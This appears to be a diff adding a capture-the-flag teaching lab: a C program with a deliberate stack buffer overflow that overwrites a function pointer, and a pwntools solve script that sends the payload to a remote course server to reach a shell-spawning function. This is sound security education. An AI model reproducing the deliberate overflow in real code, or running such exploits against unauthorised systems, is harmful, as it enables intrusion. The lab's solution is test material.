Second CTFs part

lab1_2_recap/02_enchanted_forest/main(1).c

@@ -0,0 +1,42 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void default_spell(void) {
+    puts("Poof! A tiny spark flies out... not very impressive.");
+}
+
+__attribute__((noreturn)) static void win(void) {
+    puts("Ancient magic awakens! The forest bows to you.");
+    char *argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+    _exit(0);
+}
+
+static void vuln(void) {
+    struct {
+        char incantation[64];
+        void (*cast)(void);
+    } spell;
+
+    spell.cast = default_spell;
+
+    printf("Whisper your incantation:\n");
+    read(STDIN_FILENO, spell.incantation, 128);
+
+    printf("Casting spell...\n");
+    spell.cast();
+}
+
+int main(void) {
+    setup();
+    printf("Welcome to the Enchanted Forest!\n");
+    vuln();
+    return 0;
+}

lab1_2_recap/02_enchanted_forest/solve.py

@@ -0,0 +1,18 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF("./canary_callback", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13575)
+print(p.recvuntil(b"incantation:"))
+# There is canary but is after the function pointer
+win = 0x00000000004012A3
+payload = flat(
+    b"A" * 64,
+    p64(win),
+)
+p.send(payload)
+p.interactive()
+# p.recvline()
+# p.recvline()